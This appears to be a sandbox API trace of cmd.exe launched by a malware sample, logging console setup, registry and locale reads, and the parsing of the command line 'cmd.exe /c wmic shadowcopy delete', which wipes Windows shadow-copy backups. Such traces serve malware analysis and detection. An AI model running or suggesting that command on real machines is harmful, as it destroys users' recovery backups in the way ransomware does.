VirtualQuery (in: lpAddress=0x211000, lpBuffer=0x30fa3c, dwLength=0x1c | out: lpBuffer=0x30fa3c*(BaseAddress=0x211000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0093.898] VirtualQuery (in: lpAddress=0x213000, lpBuffer=0x30fa3c, dwLength=0x1c | out: lpBuffer=0x30fa3c*(BaseAddress=0x213000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0093.898] VirtualQuery (in: lpAddress=0x310000, lpBuffer=0x30fa3c, dwLength=0x1c | out: lpBuffer=0x30fa3c*(BaseAddress=0x310000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0x100000, State=0x10000, Protect=0x1, Type=0x0)) returned 0x1c [0093.898] GetConsoleOutputCP () returned 0x1b5 [0093.898] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49ea4260 | out: lpCPInfo=0x49ea4260) returned 1 [0093.898] SetConsoleCtrlHandler (HandlerRoutine=0x49e9e72a, Add=1) returned 1 [0093.899] _get_osfhandle (_FileHandle=1) returned 0x7 [0093.899] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0093.899] _get_osfhandle (_FileHandle=1) returned 0x7 [0093.899] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49ea41ac | out: lpMode=0x49ea41ac) returned 1 [0093.900] _get_osfhandle (_FileHandle=1) returned 0x7 [0093.900] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0093.900] _get_osfhandle (_FileHandle=0) returned 0x3 [0093.900] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49ea41b0 | out: lpMode=0x49ea41b0) returned 1 [0093.901] _get_osfhandle (_FileHandle=0) returned 0x3 [0093.901] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0093.901] GetEnvironmentStringsW () returned 0x5a1ff0* [0093.901] GetProcessHeap () returned 0x590000 [0093.902] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0xaca) returned 0x5a2ac8 [0093.902] FreeEnvironmentStringsW (penv=0x5a1ff0) returned 1 [0093.902] GetProcessHeap () returned 0x590000 [0093.902] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x4) returned 0x5a0c28 [0093.902] GetEnvironmentStringsW () returned 0x5a1ff0* [0093.902] GetProcessHeap () returned 0x590000 [0093.902] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0xaca) returned 0x5a35a0 [0093.902] FreeEnvironmentStringsW (penv=0x5a1ff0) returned 1 [0093.902] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x30e9dc | out: phkResult=0x30e9dc*=0x68) returned 0x0 [0093.903] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x30e9e4, lpData=0x30e9e8, lpcbData=0x30e9e0*=0x1000 | out: lpType=0x30e9e4*=0x0, lpData=0x30e9e8*=0x0, lpcbData=0x30e9e0*=0x1000) returned 0x2 [0093.903] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x30e9e4, lpData=0x30e9e8, lpcbData=0x30e9e0*=0x1000 | out: lpType=0x30e9e4*=0x4, lpData=0x30e9e8*=0x1, lpcbData=0x30e9e0*=0x4) returned 0x0 [0093.903] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x30e9e4, lpData=0x30e9e8, lpcbData=0x30e9e0*=0x1000 | out: lpType=0x30e9e4*=0x0, lpData=0x30e9e8*=0x1, lpcbData=0x30e9e0*=0x1000) returned 0x2 [0093.903] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x30e9e4, lpData=0x30e9e8, lpcbData=0x30e9e0*=0x1000 | out: lpType=0x30e9e4*=0x4, lpData=0x30e9e8*=0x0, lpcbData=0x30e9e0*=0x4) returned 0x0 [0093.903] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x30e9e4, lpData=0x30e9e8, lpcbData=0x30e9e0*=0x1000 | out: lpType=0x30e9e4*=0x4, lpData=0x30e9e8*=0x40, lpcbData=0x30e9e0*=0x4) returned 0x0 [0093.903] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x30e9e4, lpData=0x30e9e8, lpcbData=0x30e9e0*=0x1000 | out: lpType=0x30e9e4*=0x4, lpData=0x30e9e8*=0x40, lpcbData=0x30e9e0*=0x4) returned 0x0 [0093.903] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x30e9e4, lpData=0x30e9e8, lpcbData=0x30e9e0*=0x1000 | out: lpType=0x30e9e4*=0x0, lpData=0x30e9e8*=0x40, lpcbData=0x30e9e0*=0x1000) returned 0x2 [0093.903] RegCloseKey (hKey=0x68) returned 0x0 [0093.903] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x30e9dc | out: phkResult=0x30e9dc*=0x68) returned 0x0 [0093.904] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x30e9e4, lpData=0x30e9e8, lpcbData=0x30e9e0*=0x1000 | out: lpType=0x30e9e4*=0x0, lpData=0x30e9e8*=0x40, lpcbData=0x30e9e0*=0x1000) returned 0x2 [0093.904] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x30e9e4, lpData=0x30e9e8, lpcbData=0x30e9e0*=0x1000 | out: lpType=0x30e9e4*=0x4, lpData=0x30e9e8*=0x1, lpcbData=0x30e9e0*=0x4) returned 0x0 [0093.904] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x30e9e4, lpData=0x30e9e8, lpcbData=0x30e9e0*=0x1000 | out: lpType=0x30e9e4*=0x0, lpData=0x30e9e8*=0x1, lpcbData=0x30e9e0*=0x1000) returned 0x2 [0093.904] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x30e9e4, lpData=0x30e9e8, lpcbData=0x30e9e0*=0x1000 | out: lpType=0x30e9e4*=0x4, lpData=0x30e9e8*=0x0, lpcbData=0x30e9e0*=0x4) returned 0x0 [0093.904] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x30e9e4, lpData=0x30e9e8, lpcbData=0x30e9e0*=0x1000 | out: lpType=0x30e9e4*=0x4, lpData=0x30e9e8*=0x9, lpcbData=0x30e9e0*=0x4) returned 0x0 [0093.904] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x30e9e4, lpData=0x30e9e8, lpcbData=0x30e9e0*=0x1000 | out: lpType=0x30e9e4*=0x4, lpData=0x30e9e8*=0x9, lpcbData=0x30e9e0*=0x4) returned 0x0 [0093.904] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x30e9e4, lpData=0x30e9e8, lpcbData=0x30e9e0*=0x1000 | out: lpType=0x30e9e4*=0x0, lpData=0x30e9e8*=0x9, lpcbData=0x30e9e0*=0x1000) returned 0x2 [0093.904] RegCloseKey (hKey=0x68) returned 0x0 [0093.904] time (in: timer=0x0 | out: timer=0x0) returned 0x5eb03212 [0093.904] srand (_Seed=0x5eb03212) [0093.904] GetCommandLineW () returned="cmd.exe /c wmic shadowcopy delete" [0093.904] GetCommandLineW () returned="cmd.exe /c wmic shadowcopy delete" [0093.904] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49ea5260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0093.905] GetProcessHeap () returned 0x590000 [0093.905] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x210) returned 0x5a1ff0 [0093.905] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x5a1ff8, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0093.905] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49eb0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0093.905] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x49eb0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0093.905] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x49eb0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0093.905] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0093.905] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0093.906] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0093.906] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0093.906] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0093.906] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0093.906] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0093.906] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0093.906] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0093.906] GetProcessHeap () returned 0x590000 [0093.906] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5a2ac8 | out: hHeap=0x590000) returned 1 [0093.906] GetEnvironmentStringsW () returned 0x5a2208* [0093.906] GetProcessHeap () returned 0x590000 [0093.906] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0xae2) returned 0x5a4b68 [0093.906] FreeEnvironmentStringsW (penv=0x5a2208) returned 1 [0093.906] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x49eb0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0093.906] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x49eb0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0093.906] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0093.906] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0093.907] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0093.907] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0093.907] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0093.907] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0093.907] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0093.907] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0093.907] GetProcessHeap () returned 0x590000 [0093.907] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x54) returned 0x5a5658 [0093.907] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x30f7a8 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0093.907] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x104, lpBuffer=0x30f7a8, lpFilePart=0x30f7a4 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x30f7a4*="Desktop") returned 0x25 [0093.907] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0093.907] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x30f524 | out: lpFindFileData=0x30f524*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0x5a1e70 [0093.907] FindClose (in: hFindFile=0x5a1e70 | out: hFindFile=0x5a1e70) returned 1 [0093.908] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFindFileData=0x30f524 | out: lpFindFileData=0x30f524*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="5p5NrGJn0jS HALPmcxz", cAlternateFileName="5P5NRG~1")) returned 0x5a1e70 [0093.908] FindClose (in: hFindFile=0x5a1e70 | out: hFindFile=0x5a1e70) returned 1 [0093.908] _wcsnicmp (_String1="5P5NRG~1", _String2="5p5NrGJn0jS HALPmcxz", _MaxCount=0x14) returned 20 [0093.908] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFindFileData=0x30f524 | out: lpFindFileData=0x30f524*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x1fdad3c0, ftLastAccessTime.dwHighDateTime=0x1d62227, ftLastWriteTime.dwLowDateTime=0x1fdad3c0, ftLastWriteTime.dwHighDateTime=0x1d62227, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 0x5a1e70 [0093.908] FindClose (in: hFindFile=0x5a1e70 | out: hFindFile=0x5a1e70) returned 1 [0093.908] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0093.908] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0093.908] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0093.908] GetProcessHeap () returned 0x590000 [0093.909] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5a4b68 | out: hHeap=0x590000) returned 1 [0093.909] GetEnvironmentStringsW () returned 0x5a4078* [0093.909] GetProcessHeap () returned 0x590000 [0093.909] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0xb36) returned 0x5a5eb8 [0093.909] FreeEnvironmentStringsW (penv=0x5a4078) returned 1 [0093.909] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49ea5260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0093.909] GetProcessHeap () returned 0x590000 [0093.909] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5a5658 | out: hHeap=0x590000) returned 1 [0093.909] GetProcessHeap () returned 0x590000 [0093.909] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x400e) returned 0x5a69f8 [0093.910] GetProcessHeap () returned 0x590000 [0093.910] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x3a) returned 0x5a1e70 [0093.910] GetProcessHeap () returned 0x590000 [0093.910] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5a69f8 | out: hHeap=0x590000) returned 1 [0093.910] GetConsoleOutputCP () returned 0x1b5 [0093.910] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49ea4260 | out: lpCPInfo=0x49ea4260) returned 1 [0093.910] GetUserDefaultLCID () returned 0x409 [0093.912] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x49ea4950, cchData=8 | out: lpLCData=":") returned 2 [0093.912] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x30f8e8, cchData=128 | out: lpLCData="0") returned 2 [0093.912] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x30f8e8, cchData=128 | out: lpLCData="0") returned 2 [0093.912] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x30f8e8, cchData=128 | out: lpLCData="1") returned 2 [0093.912] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x49ea4940, cchData=8 | out: lpLCData="/") returned 2 [0093.912] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x49ea4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0093.913] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x49ea4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0093.913] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x49ea4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0093.913] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x49ea4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0093.913] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x49ea4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0093.913] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x49ea4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0093.913] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x49ea4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0093.913] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x49ea4930, cchData=8 | out: lpLCData=".") returned 2 [0093.913] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x49ea4920, cchData=8 | out: lpLCData=",") returned 2 [0093.913] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0093.916] GetProcessHeap () returned 0x590000 [0093.916] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x20c) returned 0x5a2d80 [0093.916] GetConsoleTitleW (in: lpConsoleTitle=0x5a2d80, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0093.916] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0093.916] GetProcAddress (hModule=0x76d30000, lpProcName="CopyFileExW") returned 0x76d63b92 [0093.916] GetProcAddress (hModule=0x76d30000, lpProcName="IsDebuggerPresent") returned 0x76d44a5d [0093.916] GetProcAddress (hModule=0x76d30000, lpProcName="SetConsoleInputExeNameW") returned 0x76d5a79d [0093.917] GetProcessHeap () returned 0x590000 [0093.917] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x400a) returned 0x5a69f8 [0093.917] GetProcessHeap () returned 0x590000 [0093.917] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5a69f8 | out: hHeap=0x590000) returned 1 [0093.918] _wcsicmp (_String1="wmic", _String2=")") returned 78 [0093.918] _wcsicmp (_String1="FOR", _String2="wmic") returned -17 [0093.918] _wcsicmp (_String1="FOR/?", _String2="wmic") returned -17 [0093.918] _wcsicmp (_String1="IF", _String2="wmic") returned -14 [0093.918] _wcsicmp (_String1="IF/?", _String2="wmic") returned -14 [0093.918] _wcsicmp (_String1="REM", _String2="wmic") returned -5 [0093.918] _wcsicmp (_String1="REM/?", _String2="wmic") returned -5 [0093.918] GetProcessHeap () returned 0x590000 [0093.918] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x58) returned 0x5a2f98 [0093.918] GetProcessHeap () returned 0x590000 [0093.918] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x12) returned 0x5a2ff8 [0093.919] GetProcessHeap () returned 0x590000 [0093.919] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x2e) returned 0x5a3018 [0093.920] GetConsoleTitleW (in: lpConsoleTitle=0x30f5e0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0093.921] _wcsicmp (_String1="wmic", _String2="DIR") returned 19 [0093.921] _wcsicmp (_String1="wmic", _String2="ERASE") returned 18 [0093.921] _wcsicmp (_String1="wmic", _String2="DEL") returned 19 [0093.921] _wcsicmp (_String1="wmic", _String2="TYPE") returned 3 [0093.921] _wcsicmp (_String1="wmic", _String2="COPY") returned 20 [0093.921] _wcsicmp (_String1="wmic", _String2="CD") returned 20 [0093.921] _wcsicmp (_String1="wmic", _String2="CHDIR") returned 20 [0093.921] _wcsicmp (_String1="wmic", _String2="RENAME") returned 5 [0093.921] _wcsicmp (_String1="wmic", _String2="REN") returned 5 [0093.921] _wcsicmp (_String1="wmic", _String2="ECHO") returned 18 [0093.921] _wcsicmp (_String1="wmic", _String2="SET") returned 4 [0093.921] _wcsicmp (_String1="wmic", _String2="PAUSE") returned 7 [0093.921] _wcsicmp (_String1="wmic", _String2="DATE") returned 19 [0093.921] _wcsicmp (_String1="wmic", _String2="TIME") returned 3 [0093.921] _wcsicmp (_String1="wmic", _String2="PROMPT") returned 7 [0093.922] _wcsicmp (_String1="wmic", _String2="MD") returned 10 [0093.922] _wcsicmp (_String1="wmic", _String2="MKDIR") returned 10 [0093.922] _wcsicmp (_String1="wmic", _String2="RD") returned 5 [0093.922] _wcsicmp (_String1="wmic", _String2="RMDIR") returned 5 [0093.922] _wcsicmp (_String1="wmic", _String2="PATH") returned 7 [0093.922] _wcsicmp (_String1="wmic", _String2="GOTO") returned 16 [0093.922] _wcsicmp (_String1="wmic", _String2="SHIFT") returned 4 [0093.922] _wcsicmp (_String1="wmic", _String2="CLS") returned 20 [0093.922] _wcsicmp (_String1="wmic", _String2="CALL") returned 20 [0093.922] _wcsicmp (_String1="wmic", _String2="VERIFY") returned 1 [0093.922] _wcsicmp (_String1="wmic", _String2="VER") returned 1 [0093.922] _wcsicmp (_String1="wmic", _String2="VOL") returned 1 [0093.922] _wcsicmp (_String1="wmic", _String2="EXIT") returned 18 [0093.922] _wcsicmp (_String1="wmic", _String2="SETLOCAL") returned 4 [0093.922] _wcsicmp (_String1="wmic", _String2="ENDLOCAL") returned 18 [0093.922] _wcsicmp (_String1="wmic", _String2="TITLE") returned 3 [0093.922] _wcsicmp (_String1="wmic", _String2="START") returned 4 [0093.922] _wcsicmp (_String1="wmic", _String2="DPATH") returned 19 [0093.922] _wcsicmp (_String1="wmic", _String2="KEYS") returned 12 [0093.922] _wcsicmp (_String1="wmic", _String2="MOVE") returned 10 [0093.922] _wcsicmp (_String1="wmic", _String2="PUSHD") returned 7 [0093.922] _wcsicmp (_String1="wmic", _String2="POPD") returned 7 [0093.923] _wcsicmp (_String1="wmic", _String2="ASSOC") returned 22 [0093.923] _wcsicmp (_String1="wmic", _String2="FTYPE") returned 17 [0093.923] _wcsicmp (_String1="wmic", _String2="BREAK") returned 21 [0093.923] _wcsicmp (_String1="wmic", _String2="COLOR") returned 20 [0093.923] _wcsicmp (_String1="wmic", _String2="MKLINK") returned 10 [0093.923] _wcsicmp (_String1="wmic", _String2="DIR") returned 19 [0093.923] _wcsicmp (_String1="wmic", _String2="ERASE") returned 18 [0093.923] _wcsicmp (_String1="wmic", _String2="DEL") returned 19 [0093.923] _wcsicmp (_String1="wmic", _String2="TYPE") returned 3 [0093.923] _wcsicmp (_String1="wmic", _String2="COPY") returned 20 [0093.923] _wcsicmp (_String1="wmic", _String2="CD") returned 20 [0093.923] _wcsicmp (_String1="wmic", _String2="CHDIR") returned 20 [0093.923] _wcsicmp (_String1="wmic", _String2="RENAME") returned 5 [0093.923] _wcsicmp (_String1="wmic", _String2="REN") returned 5 [0093.923] _wcsicmp (_String1="wmic", _String2="ECHO") returned 18 [0093.923] _wcsicmp (_String1="wmic", _String2="SET") returned 4 [0093.923] _wcsicmp (_String1="wmic", _String2="PAUSE") returned 7 [0093.924] _wcsicmp (_String1="wmic", _String2="DATE") returned 19 [0093.924] _wcsicmp (_String1="wmic", _String2="TIME") returned 3 [0093.924] _wcsicmp (_String1="wmic", _String2="PROMPT") returned 7 [0093.924] _wcsicmp (_String1="wmic", _String2="MD") returned 10 [0093.924] _wcsicmp (_String1="wmic", _String2="MKDIR") returned 10 [0093.924] _wcsicmp (_String1="wmic", _String2="RD") returned 5 [0093.924] _wcsicmp (_String1="wmic", _String2="RMDIR") returned 5 [0093.924] _wcsicmp (_String1="wmic", _String2="PATH") returned 7 [0093.924] _wcsicmp (_String1="wmic", _String2="GOTO") returned 16 [0093.924] _wcsicmp (_String1="wmic", _String2="SHIFT") returned 4 [0093.924] _wcsicmp (_String1="wmic", _String2="CLS") returned 20 [0093.924] _wcsicmp (_String1="wmic", _String2="CALL") returned 20 [0093.924] _wcsicmp (_String1="wmic", _String2="VERIFY") returned 1 [0093.924] _wcsicmp (_String1="wmic", _String2="VER") returned 1 [0093.924] _wcsicmp (_String1="wmic", _String2="VOL") returned 1 [0093.924] _wcsicmp (_String1="wmic", _String2="EXIT") returned 18 [0093.924] _wcsicmp (_String1="wmic", _String2="SETLOCAL") returned 4 [0093.924] _wcsicmp (_String1="wmic", _String2="ENDLOCAL") returned 18 [0093.924] _wcsicmp (_String1="wmic", _String2="TITLE") returned 3 [0093.924] _wcsicmp (_String1="wmic", _String2="START") returned 4 [0093.924] _wcsicmp (_String1="wmic", _String2="DPATH") returned 19 [0093.924] _wcsicmp (_String1="wmic", _String2="KEYS") returned 12 [0093.925] _wcsicmp (_String1="wmic", _String2="MOVE") returned 10 [0093.925] _wcsicmp (_String1="wmic", _String2="PUSHD") returned 7 [0093.925] _wcsicmp (_String1="wmic", _String2="POPD") returned 7 [0093.925] _wcsicmp (_String1="wmic", _String2="ASSOC") returned 22 [0093.925] _wcsicmp (_String1="wmic", _String2="FTYPE") returned 17 [0093.925] _wcsicmp (_String1="wmic", _String2="BREAK") returned 21 [0093.925] _wcsicmp (_String1="wmic", _String2="COLOR") returned 20 [0093.925] _wcsicmp (_String1="wmic", _String2="MKLINK") returned 10 [0093.925] _wcsicmp (_String1="wmic", _String2="FOR") returned 17 [0093.925] _wcsicmp (_String1="wmic", _String2="IF") returned 14 [0093.925] _wcsicmp (_String1="wmic", _String2="REM") returned 5 [0093.925] GetProcessHeap () returned 0x590000 [0093.925] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x210) returned 0x5a3050 [0093.925] GetProcessHeap () returned 0x590000 [0093.926] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x38) returned 0x5a3268 [0093.926] _wcsnicmp (_String1="wmic", _String2="cmd ", _MaxCount=0x4) returned 20 [0093.926] GetProcessHeap () returned 0x590000 [0093.926] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x418) returned 0x5907f0 [0093.926] SetErrorMode (uMode=0x0) returned 0x0 [0093.926] SetErrorMode (uMode=0x1) returned 0x0 [0093.926] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x5907f8, lpFilePart=0x30f100 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x30f100*="Desktop") returned 0x25 [0093.926] SetErrorMode (uMode=0x0) returned 0x1 [0093.926] GetProcessHeap () returned 0x590000 [0093.927] RtlReAllocateHeap (Heap=0x590000, Flags=0x0, Ptr=0x5907f0, Size=0x5e) returned 0x5907f0 [0093.927] GetProcessHeap () returned 0x590000 [0093.927] RtlSizeHeap (HeapHandle=0x590000, Flags=0x0, MemoryPointer=0x5907f0) returned 0x5e [0093.927] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49eb0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0093.927] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0093.927] GetProcessHeap () returned 0x590000 [0093.927] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x120) returned 0x5a32a8 [0093.927] GetProcessHeap () returned 0x590000 [0093.927] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x238) returned 0x590858 [0094.250] GetProcessHeap () returned 0x590000 [0094.250] RtlReAllocateHeap (Heap=0x590000, Flags=0x0, Ptr=0x590858, Size=0x122) returned 0x590858 [0094.250] GetProcessHeap () returned 0x590000 [0094.250] RtlSizeHeap (HeapHandle=0x590000, Flags=0x0, MemoryPointer=0x590858) returned 0x122 [0094.250] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x49eb0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0094.250] 